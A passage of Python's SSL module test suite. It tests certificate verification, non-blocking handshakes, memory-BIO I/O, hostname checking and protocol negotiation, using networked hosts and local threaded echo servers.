s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.setblocking(False)
rc = s.connect_ex(('svn.python.org', 443))
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.settimeout(0.0000001)
rc = s.connect_ex(('svn.python.org', 443))
if rc == 0:
self.skipTest("svn.python.org responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
finally:
s.close()
def test_connect_ex_error(self):
with support.transient_internet("svn.python.org"):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SVN_PYTHON_ORG_ROOT_CERT)
try:
rc = s.connect_ex(("svn.python.org", 444))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
self.assertIn(rc, (errno.ECONNREFUSED, errno.EWOULDBLOCK))
finally:
s.close()
def test_connect_with_context(self):
with support.transient_internet("svn.python.org"):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
try:
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# Same with a server hostname
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="svn.python.org")
s.connect(("svn.python.org", 443))
s.close()
# This should fail because we have no verification certs
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, ("svn.python.org", 443))
s.close()
# This should succeed because we specify the root cert
ctx.load_verify_locations(SVN_PYTHON_ORG_ROOT_CERT)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
with support.transient_internet("svn.python.org"):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_cadata(self):
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
with support.transient_internet("svn.python.org"):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(("svn.python.org", 443))
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(("svn.python.org", 443))
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
with support.transient_internet("svn.python.org"):
ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
ss.connect(("svn.python.org", 443))
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
with support.transient_internet("svn.python.org"):
s = socket.socket(socket.AF_INET)
s.connect(("svn.python.org", 443))
s.setblocking(False)
s = ssl.wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
s.close()
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
def _test_get_server_certificate(host, port, cert=None):
with support.transient_internet(host):
pem = ssl.get_server_certificate((host, port))
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
try:
pem = ssl.get_server_certificate((host, port),
ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
self.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
pem = ssl.get_server_certificate((host, port),
ca_certs=cert)
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
_test_get_server_certificate('svn.python.org', 443, SVN_PYTHON_ORG_ROOT_CERT)
if support.IPV6_ENABLED:
_test_get_server_certificate('ipv6.google.com', 443)
def test_ciphers(self):
remote = ("svn.python.org", 443)
with support.transient_internet(remote[0]):
with ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(remote)
with ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(remote)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = ssl.wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(remote)
def test_algorithms(self):
# Issue #8484: all algorithms should be available when verifying a
# certificate.
# SHA256 was added in OpenSSL 0.9.8
if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION)
# sha256.tbs-internet.com needs SNI to use the correct certificate
if not ssl.HAS_SNI:
self.skipTest("SNI needed for this test")
# https://sha2.hboeck.de/ was used until 2011-01-08 (no route to host)
remote = ("sha256.tbs-internet.com", 443)
sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
with support.transient_internet("sha256.tbs-internet.com"):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(sha256_cert)
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="sha256.tbs-internet.com")
try:
s.connect(remote)
if support.verbose:
sys.stdout.write("\nCipher with %r is %r\n" %
(remote, s.cipher()))
sys.stdout.write("Certificate is:\n%s\n" %
pprint.pformat(s.getpeercert()))
finally:
s.close()
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
with support.transient_internet("svn.python.org"):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect(("svn.python.org", 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
with support.transient_internet("svn.python.org"):
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s) as ss:
ss.connect(("svn.python.org", 443))
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
class NetworkedBIOTests(unittest.TestCase):
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple IO loop. Call func(*args) depending on the error we get
# (WANT_READ or WANT_WRITE) move data between the socket and the BIOs.
timeout = kwargs.get('timeout', 10)
count = 0
while True:
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
# Note that we get a spurious -1/SSL_ERROR_SYSCALL for
# non-blocking IO. The SSL_shutdown manpage hints at this.
# It *should* be safe to just ignore SYS_ERROR_SYSCALL because
# with a Memory BIO there's no syscalls (for IO at least).
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE,
ssl.SSL_ERROR_SYSCALL):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_handshake(self):
with support.transient_internet("svn.python.org"):
sock = socket.socket(socket.AF_INET)
sock.connect(("svn.python.org", 443))
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(SVN_PYTHON_ORG_ROOT_CERT)
ctx.check_hostname = True
sslobj = ctx.wrap_bio(incoming, outgoing, False, 'svn.python.org')
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
sock.close()
def test_read_write_data(self):
with support.transient_internet("svn.python.org"):
sock = socket.socket(socket.AF_INET)
sock.connect(("svn.python.org", 443))
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'GET / HTTP/1.0\r\n\r\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf[:5], b'HTTP/')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
sock.close()
try:
import threading
except ImportError:
_have_threads = False
else:
_have_threads = True
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_protocols.append(self.sslconn.selected_npn_protocol())
except (ssl.SSLError, ConnectionResetError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
self.server.conn_errors.append(e)
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLSv1)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_protocols = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer (asyncore.dispatcher):
class ConnectionHandler (asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = ssl.wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
def start (self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def bad_cert_test(certfile):
"""
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with the given client certificate fails.
"""
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=CERTFILE, chatty=False,
connectionchatty=False)
with server:
try:
with socket.socket() as sock:
s = ssl.wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
except ssl.SSLError as x:
if support.verbose:
sys.stdout.write("\nSSLError is %s\n" % x.args[1])
except OSError as x:
if support.verbose:
sys.stdout.write("\nOSError is %s\n" % x.args[1])
except OSError as x:
if x.errno != errno.ENOENT:
raise
if support.verbose:
sys.stdout.write("\OSError is %s\n" % str(x))
else:
raise AssertionError("Use of invalid cert should have failed!")
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
})
s.close()
stats['server_npn_protocols'] = server.selected_protocols
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_SSLv23:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(CERTFILE)
ctx.load_verify_locations(CERTFILE)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket(),
do_handshake_on_connect=False)
s.connect((HOST, server.port))
# getpeercert() raise ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
s.close()
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
self.assertEqual(context.verify_flags, ssl.VERIFY_DEFAULT)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="localhost") as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(ssl.CertificateError,
"hostname 'invalid' doesn't match 'localhost'"):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
context.wrap_socket(s)
def test_empty_cert(self):
"""Connecting with an empty cert file"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"nullcert.pem"))
def test_malformed_cert(self):
"""Connecting with a badly formatted certificate (syntax error)"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"badcert.pem"))
def test_nonexisting_cert(self):
"""Connecting with a non-existing cert file"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"wrongcert.pem"))
def test_malformed_key(self):
"""Connecting with a badly formatted key (syntax error)"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"badkey.pem"))
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = ssl.wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
